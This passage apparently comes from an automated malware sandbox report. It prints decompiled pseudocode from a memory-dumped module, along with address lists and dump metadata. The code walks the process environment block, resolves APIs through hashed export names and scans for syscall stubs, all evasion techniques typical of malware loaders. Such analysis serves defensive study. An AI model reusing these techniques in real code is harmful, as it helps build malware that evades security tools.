								_t217 = E72ADF558(_t324, _t441);
								_t218 =  *(_t458 + 4);
								__eflags =  *_t217 -  *((intOrPtr*)(_t218 + 0x30));
								if( *_t217 ==  *((intOrPtr*)(_t218 + 0x30))) {
									break;
								}
								_t435 = _t435 + 1;
								__eflags = _t435 - _t432;
								if(_t435 < _t432) {
									continue;
								}
								goto L46;
							}
							__eflags = _t435 - 0xffffffff;
							if(_t435 != 0xffffffff) {
								_t219 = E72ADF568( *_t458);
								__eflags = _t219 - _t441;
								if(_t219 > _t441) {
									 *((intOrPtr*)(_t458 + 0x74)) = 4 + _t435 * 4;
									_t247 = E72ADF568( *_t458);
									__eflags = _t247 -  *((intOrPtr*)(_t458 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t458 + 0x74))) {
										 *((intOrPtr*)(_t458 + 0x90)) = E72ADF558( *(_t458 + 4), _t441);
										 *((intOrPtr*)(_t458 + 0x8c)) = E72ADF558( *(_t458 + 4),  *((intOrPtr*)(_t458 + 0x74)));
										E72AE382C( *((intOrPtr*)(_t458 + 0x98)),  *((intOrPtr*)(_t458 + 0x90)), E72ADF568( *_t458) -  *((intOrPtr*)(_t458 + 0x74)));
										_t458 = _t458 + 0xc;
									}
									E72ADF8C4( *(_t458 + 4), E72ADF568( *_t458) + 0xfffffffc);
									_t424 =  *(_t458 + 4);
									_t75 = _t424 + 0x18;
									 *_t75 =  *(_t424 + 0x18) - 1;
									__eflags =  *_t75;
								}
								_t220 = E72ADF568(_t324);
								__eflags = _t220 - _t441;
								if(_t220 > _t441) {
									_t435 = 4 + _t435 * 4;
									_t237 = E72ADF568(_t324);
									__eflags = _t237 - _t435;
									if(_t237 > _t435) {
										_t238 = E72ADF558(_t324, _t441);
										 *((intOrPtr*)(_t458 + 0x94)) = E72ADF558(_t324, _t435);
										E72AE382C(_t238,  *((intOrPtr*)(_t458 + 0x98)), E72ADF568(_t324) - _t435);
										_t458 = _t458 + 0xc;
									}
									E72ADF8C4(_t324, E72ADF568(_t324) + 0xfffffffc);
									_t246 =  *(_t458 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E72ADF8C4( *(_t458 + 4), E72ADF568( *_t458) + 4);
								 *(E72ADF558( *(_t458 + 4), E72ADF568( *_t458) + 0xfffffffc)) =  *( *(_t458 + 4) + 0x2c);
								 *((intOrPtr*)( *(_t458 + 4) + 0x18)) =  *((intOrPtr*)( *(_t458 + 4) + 0x18)) + 1;
								E72ADF8C4(_t324, E72ADF568(_t324) + 4);
								 *((intOrPtr*)(E72ADF558(_t324, E72ADF568(_t324) + 0xfffffffc))) =  *((intOrPtr*)( *(_t458 + 4) + 0x30));
								 *( *(_t458 + 4)) =  *( *(_t458 + 4)) + 1;
							}
						}
					}
					L46:
					 *((intOrPtr*)(_t458 + 8)) = 0;
					 *((intOrPtr*)(_t458 + 0xc)) = 0;
					E72ADF620(_t458 + 0x14, 0);
					 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t458 + 0x68));
					 *((intOrPtr*)(_t458 + 0x38)) = 0;
					E72ADF620(_t458 + 0x40, 0);
					_t178 =  *(_t458 + 4);
					_t416 = 0x40;
					__eflags =  *((intOrPtr*)(_t178 + 0x18)) - 0x40;
					_t417 =  <  ?  *((void*)(_t178 + 0x18)) : _t416;
					 *(_t458 + 0x80) = _t417;
					__eflags = _t417;
					if(_t417 <= 0) {
						L57:
						_t415 = E72ADF558(_t458 + 0x14, 0);
						_t180 = E72AE2878( *((intOrPtr*)(_t458 + 0xc)), _t179, 0x3e8);
						_t132 = _t180 - 0x80; // -128
						_t181 = _t132;
						__eflags = _t181 - 0x3f;
						_t316 =  <=  ? _t181 : _t180;
						__eflags = _t316 - 0x102;
						if(_t316 == 0x102) {
							goto L59;
						} else {
							__eflags = _t316 - 0x3f;
							if(_t316 <= 0x3f) {
								__eflags = _t316 << 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) + 0x2c)) =  *((intOrPtr*)(E72ADF558( *(_t458 + 4), _t316 << 2)));
								_t188 = E72ADF558( *(_t458 + 0x7c), _t316 << 2);
								_t415 =  *(_t458 + 4);
								 *((intOrPtr*)(_t415 + 0x30)) =  *_t188;
								_t318 =  *((intOrPtr*)(_t415 + 0x2c));
								E72ADB680(_t458 + 0x34);
								E72ADB680(_t458 + 8);
							} else {
								goto L59;
							}
						}
						goto L62;
					} else {
						_t454 = 0;
						__eflags = 0;
						while(1) {
							E72ADCB48(_t458 + 0x4c);
							_t415 = 0;
							_t345 = _t458 + 0x4c;
							 *((char*)(_t345 + 4)) = 0;
							 *((intOrPtr*)(_t345 + 0x20)) = 0;
							__eflags = E72ADC33C(_t345);
							if(__eflags != 0) {
								break;
							}
							E72ADF8C4(_t458 + 0x14, E72ADF568(_t458 + 0x10) + 4);
							 *((intOrPtr*)(E72ADF558(_t458 + 0x14, E72ADF568(_t458 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t458 + 0x4c));
							 *((intOrPtr*)(_t458 + 0xc)) =  *((intOrPtr*)(_t458 + 0xc)) + 1;
							_t202 = E72AE2F8C(0xa5eabdf8, 0xf3119fba);
							__eflags = _t202;
							if(_t202 == 0) {
								_t415 =  *(_t458 + 0x6c);
								__eflags = _t415;
								if(__eflags == 0) {
									break;
								} else {
									__eflags = _t415 - 0xffffffff;
									if(__eflags != 0) {
										E72ADF8C4(_t458 + 0x40, E72ADF568(_t458 + 0x3c) + 4);
										 *(E72ADF558(_t458 + 0x40, E72ADF568(_t458 + 0x3c) + 0xfffffffc)) =  *(_t458 + 0x6c);
										 *((intOrPtr*)(_t458 + 0x4c - 0x14)) =  *((intOrPtr*)(_t458 + 0x4c - 0x14)) + 1;
										E72ADCDE0(_t458 + 0x4c, __eflags);
										_t454 = _t454 + 1;
										__eflags = _t454 -  *(_t458 + 0x80);
										if(_t454 <  *(_t458 + 0x80)) {
											continue;
										} else {
											_t437 = 0;
											__eflags = 0;
											do {
												_t211 = E72ADF558( *(_t458 + 4), _t437 * 4);
												_t212 = E72ADF558(_t458 + 0x40, _t437 * 4);
												E72AD8C14( *_t211, E72AE034C(0xa5eabdf8, 0x4145240a),  *_t212, 0, 0);
												_t437 = _t437 + 1;
												__eflags = _t437 -  *(_t458 + 0x80);
											} while (_t437 <  *(_t458 + 0x80));
											goto L57;
										}
									} else {
										break;
									}
								}
							} else {
								__eflags = 0;
								_push(2);
								_push(0);
								_push(0);
								_push(_t458 + 0x6c);
								_push( *((intOrPtr*)(_t458 + 0x78)));
								_push( *((intOrPtr*)(_t458 + 0x60)));
								_push(0xffffffff);
								asm("int3");
								return _t202;
							}
							goto L71;
						}
						E72ADCDE0(_t458 + 0x4c, __eflags);
						L59:
						E72ADB680(_t458 + 0x34);
						E72ADB680(_t458 + 8);
						goto L60;
					}
					goto L71;
				}
			}

0x72ad84e4
0x72ad84e8
0x72ad84f1
0x72ad84f7
0x72ad84fb
0x72ad84ff
0x72ad850a
0x72ad850e
0x72ad8513
0x72ad851b
0x72ad852b
0x00000000
0x72ad852d
0x72ad8535
0x72ad853c
0x72ad853c
0x72ad8a8f
0x72ad8a91
0x72ad8ad2
0x72ad8ad4
0x72ad8ae3
0x72ad8aef
0x72ad8ad6
0x72ad8ade
0x72ad8af5
0x72ad8afa
0x00000000
0x72ad8ae0
0x72ad8ae2
0x00000000
0x72ad8ae2
0x72ad8ade
0x00000000
0x72ad8546
0x72ad854a
0x72ad854d
0x72ad8553
0x72ad8553
0x72ad8555
0x72ad855c
0x72ad856a
0x72ad856c
0x72ad8570
0x72ad8572
0x72ad859e
0x72ad85a2
0x72ad85a7
0x72ad85ac
0x72ad85b0
0x72ad85b4
0x72ad85bb
0x72ad85c0
0x72ad85c2
0x72ad8b51
0x72ad8b60
0x72ad8b7f
0x72ad8b84
0x72ad8b84
0x72ad85d5
0x72ad85da
0x72ad85de
0x72ad85de
0x72ad85de
0x72ad85ef
0x72ad85f1
0x72ad85f3
0x72ad8604
0x72ad8604
0x72ad8609
0x72ad860e
0x72ad8612
0x72ad8617
0x72ad861e
0x72ad8623
0x72ad8625
0x72ad8b13
0x72ad8b1f
0x72ad8b39
0x72ad8b3e
0x72ad8b3e
0x72ad863b
0x72ad8640
0x72ad8644
0x72ad8644
0x72ad8644
0x72ad8644
0x72ad8647
0x72ad8647
0x72ad8574
0x72ad8576
0x72ad8576
0x72ad8578
0x72ad8584
0x72ad858b
0x72ad858d
0x00000000
0x00000000
0x72ad8599
0x72ad859a
0x72ad859c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x72ad859c
0x72ad858f
0x72ad8592
0x00000000
0x00000000
0x72ad8594
0x72ad8592
0x72ad8648
0x72ad864c
0x72ad864d
0x72ad864d
0x72ad8555
0x72ad8655
0x72ad865a
0x72ad8660
0x72ad8660
0x72ad8662
0x72ad8669
0x72ad8677
0x72ad8679
0x72ad867d
0x72ad867f
0x72ad8681
0x72ad86bc
0x72ad86cb
0x72ad86cd
0x72ad86cf
0x72ad86ed
0x72ad86ef
0x72ad86f1
0x72ad8703
0x72ad8721
0x72ad872a
0x72ad872d
0x72ad873b
0x72ad874c
0x72ad876a
0x72ad876c
0x72ad8770
0x72ad8770
0x72ad8770
0x72ad86f1
0x72ad8683
0x72ad8687
0x72ad8687
0x72ad868c
0x72ad8693
0x72ad86a2
0x72ad86a9
0x72ad86ab
0x00000000
0x00000000
0x72ad86b7
0x72ad86b8
0x72ad86ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x72ad86ba
0x72ad86ad
0x72ad86b0
0x00000000
0x00000000
0x72ad86b2
0x72ad86b0
0x72ad8772
0x72ad8772
0x72ad8773
0x72ad8773
0x72ad8662
0x72ad8781
0x72ad8786
0x72ad878a
0x72ad878e
0x72ad8794
0x72ad8796
0x72ad8798
0x72ad87a2
0x72ad87a2
0x72ad87a4
0x72ad87a7
0x72ad87a9
0x72ad87b1
0x72ad87b8
0x72ad87bc
0x72ad87bf
0x00000000
0x00000000
0x72ad88bb
0x72ad88bc
0x72ad88be
0x00000000
0x00000000
0x00000000
0x72ad88be
0x72ad87c5
0x72ad87c8
0x72ad87d1
0x72ad87d6
0x72ad87d8
0x72ad87e4
0x72ad87e8
0x72ad87ed
0x72ad87f1
0x72ad8bce
0x72ad8be2
0x72ad8c04
0x72ad8c09
0x72ad8c09
0x72ad8807
0x72ad880c
0x72ad8810
0x72ad8810
0x72ad8810
0x72ad8810
0x72ad8815
0x72ad881a
0x72ad881c
0x72ad8820
0x72ad8827
0x72ad882c
0x72ad882e
0x72ad8b8f
0x72ad8b9e
0x72ad8bb7
0x72ad8bbc
0x72ad8bbc
0x72ad8841
0x72ad8846
0x72ad884a
0x72ad884a
0x72ad884a
0x72ad885c
0x72ad887d
0x72ad8885
0x72ad8893
0x72ad88b1
0x72ad88b7
0x72ad88b7
0x72ad87c8
0x72ad8798
0x72ad88c4
0x72ad88c6
0x72ad88ca
0x72ad88d3
0x72ad88de
0x72ad88e2
0x72ad88eb
0x72ad88f0
0x72ad88f6
0x72ad88f7
0x72ad88fb
0x72ad88ff
0x72ad8906
0x72ad8908
0x72ad8a48
0x72ad8a59
0x72ad8a60
0x72ad8a67
0x72ad8a67
0x72ad8a6a
0x72ad8a6d
0x72ad8a70
0x72ad8a76
0x00000000
0x72ad8a78
0x72ad8a78
0x72ad8a7b
0x72ad8a94
0x72ad8aac
0x72ad8aaf
0x72ad8ab4
0x72ad8abe
0x72ad8ac1
0x72ad8ac4
0x72ad8acd
0x00000000
0x00000000
0x00000000
0x72ad8a7b
0x00000000
0x72ad890e
0x72ad8910
0x72ad8910
0x72ad8912
0x72ad8916
0x72ad891b
0x72ad891d
0x72ad8921
0x72ad8924
0x72ad892c
0x72ad892e
0x00000000
0x00000000
0x72ad8945
0x72ad8960
0x72ad8962
0x72ad8970
0x72ad8975
0x72ad8977
0x72ad8994
0x72ad8998
0x72ad899a
0x00000000
0x72ad899c
0x72ad899c
0x72ad899f
0x72ad89c0
0x72ad89df
0x72ad89e5
0x72ad89e8
0x72ad89ed
0x72ad89ee
0x72ad89f5
0x00000000
0x72ad89fb
0x72ad89fd
0x72ad89fd
0x72ad89ff
0x72ad8a0b
0x72ad8a17
0x72ad8a39
0x72ad8a3e
0x72ad8a3f
0x72ad8a3f
0x00000000
0x72ad89ff
0x00000000
0x00000000
0x00000000
0x72ad899f
0x72ad8979
0x72ad8979
0x72ad897f
0x72ad8981
0x72ad8982
0x72ad8983
0x72ad8984
0x72ad8988
0x72ad898c
0x72ad898e
0x72ad898f
0x72ad898f
0x00000000
0x72ad8977
0x72ad89a5
0x72ad8a7d
0x72ad8a81
0x72ad8a8a
0x00000000
0x72ad8a8a
0x00000000
0x72ad8908

Strings

, xrefs: 72AD8AD6

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction ID: 914eb515dab1265162104812e9cf467f5030c5f54bfa8aaa5443129247113c60
Opcode Fuzzy Hash: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction Fuzzy Hash: 2C1259716483459FC714DF2CCA80A6FBBA5AF95700F50896DE5AA872BCEB30DD05CB42

Uniqueness

Uniqueness Score: -1.00%

Function 72AE14D8, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E72AE14D8(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E72AE03A0(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x72aed208 == 0 ||  *0x72aed2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x212ae3b8;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E72AE4BE0( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x72aed2ec |  *0x72aed2ed;
									if(( *0x72aed2ec |  *0x72aed2ed) == 0) {
										_t525 =  *0x72aed208; // 0x4cf1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x72aed2ec = 1;
											_t526 = E72AE3558(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E72AE1CCC(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x72aed208 = _t526;
											 *0x72aed2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E72AE3558(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E72AE1CCC(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E72ADE070(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E72ADE070(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0xd926c223;
									if(_t535[0x54] == 0xd926c223) {
										 *0x72aed20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x80febacc;
										if(_t535[0x54] == 0x80febacc) {
											 *0x72aed210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E72ADE94C( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E72AE2F94(0xa5eabdf8, 0x9766f056, 0xa5eabdf8, 0xa5eabdf8);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x72aed2e4 = 1;
					E72ADF620( &(_t535[0x38]), 0);
					E72ADF620( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E72ADF558( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E72AE2F94(0xa5eabdf8, 0x22dc1034, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E72ADF8C4( &(_t535[0xc]), E72ADF568( &(_t535[8])) + 0x14);
								_t369 = E72ADF558( &(_t535[0xc]), E72ADF568( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E72ADF6F0( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E72ADF620( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E72ADF6F0( &(_t535[8]));
							E72ADF6F0( &(_t535[0x164]));
							E72ADF620( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E72ADF620( &(_t535[0x20]), 0);
							_push(0xa5eabdf8);
							_t289 = E72AE1DD0(0xa5eabdf8);
							_t290 = E72AE1388( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E72AE1D08( &(_t535[0x164]), 0xa5eabdf8);
							_t518 =  &(_t535[0x178]);
							E72ADD0D0( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E72AE5C40( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E72AE5C74( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E72AE8D74( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E72ADF6F0( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E72ADBC00( &(_t535[0x110]));
							}
							E72ADD098( &(_t535[0x104]));
							E72ADD098(_t518);
							E72ADD098( &(_t535[0x15c]));
							E72ADD098( &(_t535[0x154]));
							E72AE9058( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E72ADF6B4( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E72AE901C( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E72ADF558( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E72ADF568( &(_t535[0x44]));
								_t519 =  *(0x72aebce0 + _t381 * 4);
								_t531 = E72AE8FE8( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E72AE8754( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E72ADF568( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E72ADF578( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E72ADF568( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E72ADF8C4( &(_t535[0x20]), E72ADF568( &(_t535[0x1c])) + 8);
										E72ADF558( &(_t535[0x20]), E72ADF568( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E72AE30A4(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E72ADF8C4( &(_t535[0x48]), _t535[0x70]);
									E72AE30A4(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E72ADF8DC( &(_t535[0x44]), _t563);
									E72ADF8DC( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E72AE90A8( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E72AE9070( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E72ADF6F0( &(_t535[0x144]));
									E72ADF6F0( &(_t535[0x134]));
									goto L38;
								}
								 *0x72aed2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E72ADF6F0( &(_t535[0x11c]));
							E72AE8DD4(_t381,  &(_t535[0xd8]));
							E72ADF6F0( &(_t535[0x1c]));
							E72ADF6F0( &(_t535[0x44]));
							E72ADF6F0( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E72ADF558( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E72ADF8C4( &(_t535[0x38]), E72ADF568( &(_t535[0x34])) + 0x14);
							_t347 = E72ADF558( &(_t535[0x38]), E72ADF568( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E72ADF558( &(_t535[0xc]), _t62);
						_t455 = E72ADF558( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x72ae14e4
0x72ae14eb
0x72ae14ee
0x72ae14f5
0x72ae1c77
0x72ae1c77
0x72ae14fb
0x72ae1506
0x72ae1a45
0x72ae1a49
0x00000000
0x72ae1cc8
0x72ae1a4f
0x72ae1a52
0x72ae1a55
0x72ae1a5f
0x72ae1a6e
0x72ae1a70
0x72ae1a77
0x72ae1c61
0x72ae1c63
0x72ae1c66
0x72ae1c6a
0x00000000
0x72ae1c6a
0x72ae1a86
0x72ae1a91
0x72ae1a98
0x72ae1a9b
0x72ae1a9d
0x72ae1aa0
0x72ae1aa3
0x72ae1aa9
0x72ae1ab7
0x72ae1ac7
0x72ae1aec
0x72ae1afd
0x72ae1b00
0x72ae1b02
0x72ae1b66
0x72ae1b69
0x72ae1b69
0x72ae1b6b
0x72ae1b6e
0x72ae1b72
0x72ae1b72
0x72ae1b76
0x00000000
0x00000000
0x72ae1b83
0x72ae1b89
0x72ae1bbd
0x72ae1bc3
0x72ae1bc5
0x72ae1c94
